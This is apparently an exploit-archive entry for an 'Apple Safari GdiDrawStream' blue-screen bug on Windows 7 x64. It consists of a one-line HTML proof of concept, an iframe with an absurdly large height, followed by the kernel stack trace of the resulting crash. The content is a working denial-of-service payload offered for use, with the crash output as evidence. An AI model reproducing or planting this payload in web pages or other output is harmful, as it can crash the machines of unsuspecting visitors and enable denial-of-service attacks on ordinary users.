Apple Safari - GdiDrawStream Blue Screen of Death

# Exploit Title: GdiDrawStream BSoD
# Date: 18-12-2011
# Author: webDEViL
# Version: Latest
# Tested on: Windows 7 x64 using Safari
# http://twitter.com/w3bd3vil

<iframe height='18082563'></iframe>


---#---
STACK_TEXT:
fffff880`08b50f78 fffff800`0328e3bf : 00000000`00000050 fffff904`c2730258
00000000`00000001 fffff880`08b510e0 : nt!KeBugCheckEx
fffff880`08b50f80 fffff800`032e1d6e : 00000000`00000001 fffff904`c2730258
00000000`00002700 fffff880`08b51380 : nt! ?? ::FNODOBFM::`string'+0x44791
fffff880`08b510e0 fffff960`00164e2e : fffff960`00280a11 fffff900`c1f11320
fffff900`c273fe38 00000000`28451d38 : nt!KiPageFault+0x16e
fffff880`08b51278 fffff960`00280a11 : fffff900`c1f11320 fffff900`c273fe38
00000000`28451d38 00000011`00000001 : win32k!memmove+0x25e
fffff880`08b51280 fffff960`00280ca2 : fffff880`08b51380 00000000`000001dc
fffff900`c2062c78 fffff904`c2730238 : win32k!NtGdiUpdateTransform+0x161
fffff880`08b512b0 fffff960`002815e4 : 00000000`000001dc fffff902`c2734638
00000000`0009f580 00000000`00000000 : win32k!NtGdiUpdateTransform+0x3f2
fffff880`08b51310 fffff960`00281854 : fffff900`c2730018 fffff900`c2062978
00000000`fffffff2 fffff900`00000001 : win32k!NtGdiUpdateTransform+0xd34
fffff880`08b514f0 fffff960`0028208e : fffff900`c1d1a028 00000000`00000000
fffff900`c2730018 00000000`00000000 : win32k!NtGdiUpdateTransform+0xfa4
fffff880`08b515b0 fffff960`002821fd : fffff900`c1d1a028 fffff900`c2062978
00000000`0009f580 fffff900`c1f11320 : win32k!NtGdiUpdateTransform+0x17de
fffff880`08b516d0 fffff960`002823bc : fffff900`c00c0010 00000000`0000003c
fffff880`08b51b20 fffff900`c1d1a010 : win32k!EngNineGrid+0xb1
fffff880`08b51770 fffff960`00282879 : 00000000`00000000 fffff900`c2062978
00000000`00000000 fffff900`c1d1a010 : win32k!EngDrawStream+0x1a0
fffff880`08b51820 fffff960`002831cb : fffff880`08b51938 00000000`00000000
fffff900`c2062960 fffff900`c1f11320 : win32k!NtGdiDrawStreamInternal+0x47d
fffff880`08b518d0 fffff960`0029e93c : 00000000`3f010ad8 00000000`00000000
fffff880`08b51af0 fffff960`00000000 : win32k!GreDrawStream+0x917
fffff880`08b51ac0 fffff800`032e2ed3 : fffffa80`09777b60 00000000`00010000
00000000`000309c0 00000000`7efdb000 : win32k!NtGdiDrawStream+0x9c
fffff880`08b51c20 00000000`73f003fa : 00000000`00000000 00000000`00000000
00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0021dd78 00000000`00000000 : 00000000`00000000 00000000`00000000
00000000`00000000 00000000`00000000 : 0x73f003fa
---#---